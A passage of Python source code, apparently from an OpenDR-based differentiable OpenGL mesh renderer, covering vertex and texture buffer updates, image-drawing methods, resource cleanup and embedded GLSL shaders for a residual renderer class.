JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
if np.any(boundaryImage):
result_wrt_vc = result_wrt_vc_bnd + result_wrt_vc_nonbnd
else:
result_wrt_vc = result_wrt_vc_nonbnd
return result_wrt_vc
def on_changed(self, which):
super().on_changed(which)
if 'v' or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size + textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
# if 'imageGT' in which:
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# # GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGBA, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
if 'v' or 'f' or 'vc' or 'ft' or 'camera' or 'texture_stack' or 'imageGT' in which:
self.render_image_buffers()
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms + terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result != 0
@depends_on(dterms + terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
# use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0], 1]) * mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(
self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
# Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, :3].astype(np.float64)) / 255.0
result[:, :, 1] = 1. - result[:, :, 1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:, 1] = 1.0 - 1.0 * data[:, 1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on('ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size / 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = np.zeros((self.vpe.size, 2), dtype=np.float64, order='C')
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms + terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],
GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3).astype(np.float64)) / 255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0., 0., 0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1, 1, 3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:, :, :2].copy()
# Temprary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:, :, 0] *= self.texture_image.shape[1] - 1
texcoord_image[:, :, 1] *= self.texture_image.shape[0] - 1
texture_idx = (self.texcoord_image[:, :, 2] * len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:, :, 0] + texcoord_image[:, :, 1] * self.texture_image.shape[1]
return texcoord_image, texture_idx
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class ResidualRendererOpenDR(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list', 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_face_ids_list for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Ouput data
out vec3 color;
void main(){
color = theColor * texture2D( myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER, FRAGMENT_SHADER)
# Define the other VAO/VBOs and shaders.
# Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
self.line_width = 2.
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures(1, texture)
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vbo_colors_mesh = vbo_colors_mesh + [vbo_colors]
vbo_vertices_mesh = vbo_vertices_mesh + [vbo_verts]
vbo_uvs_mesh = vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors_mesh]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_vertices_mesh]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs_mesh]
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Ouput data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture2D( myTextureSampler, UV).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
//layout(location = 7) uniform sampler2D imageGT;
uniform float ww;
uniform float wh;
uniform int sample;
// Ouput data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//layout(location = 5) out vec3 res;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
//vec3 imgColor = texture2D(imageGT, gl_FragCoord.xy/vec2(ww,wh)).rgb;
//res = imgColor - colorFetchOut;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
